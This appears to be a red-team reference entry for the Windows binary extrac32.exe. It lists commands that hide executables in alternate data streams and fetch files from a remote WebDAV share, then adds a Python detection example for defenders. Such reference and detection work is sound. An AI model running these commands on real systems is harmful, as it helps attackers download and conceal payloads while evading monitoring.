~/Privilege Escalation/Windows/Binaries# cat Extrac32.exe.md
Paths:
C:\Windows\System32\extrac32.exe
C:\Windows\SysWOW64\extrac32.exe
Detection:
Alternate data streams
Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Extracts the source CAB file from a UNC path into an Alternate Data Stream (ADS) of the target file.
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Download
Copy the source file to the destination file and overwrite it.
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Copy
Copies calc.exe to another folder.
extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
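For defenders, the three usage patterns above can be recognised from process-creation command lines. The following is an added example, not part of the original page: the tag names and the `classify` helper are hypothetical, and the sample lines are the page's own commands plus two constructed benign controls.

```python
import re

# Constructed sample process-creation command lines: the first four are the
# commands listed on this page, the last two are constructed benign controls.
SAMPLES = [
    r'extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe',
    r'extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe',
    r'extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt',
    r'extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe',
    r'"C:\Windows\System32\extrac32.exe" /Y C:\Temp\drivers.cab',
    r'notepad.exe C:\ADS\file.txt:procexp.exe',
]

def tokenize(cmdline):
    """Split on whitespace, keeping double-quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def classify(cmdline):
    """Return sorted tags for the extrac32 usage patterns described on this page."""
    tokens = tokenize(cmdline)
    if not tokens:
        return []
    image = tokens[0].rsplit('\\', 1)[-1].lower()
    if image not in ('extrac32', 'extrac32.exe'):
        return []
    args = tokens[1:]
    switches = {a.lower() for a in args if re.fullmatch(r'/[A-Za-z]', a)}
    paths = [a for a in args if not re.fullmatch(r'/[A-Za-z]', a)]
    tags = set()
    # ADS target: a colon left over after removing the drive-letter prefix.
    if any(':' in re.sub(r'^[A-Za-z]:', '', p) for p in paths):
        tags.add('ads_target')
    # Remote source: the first path argument is a UNC path (\\server\share).
    if paths and paths[0].startswith('\\\\'):
        tags.add('unc_source')
    # /C is the copy switch used in the Download and Copy commands above.
    if '/c' in switches:
        tags.add('copy_mode')
    return sorted(tags)

if __name__ == '__main__':
    for line in SAMPLES:
        print(classify(line), line)
```

Matching on the image name alone misses a renamed copy of the binary, so pair it with the original-file-name field where your telemetry records one.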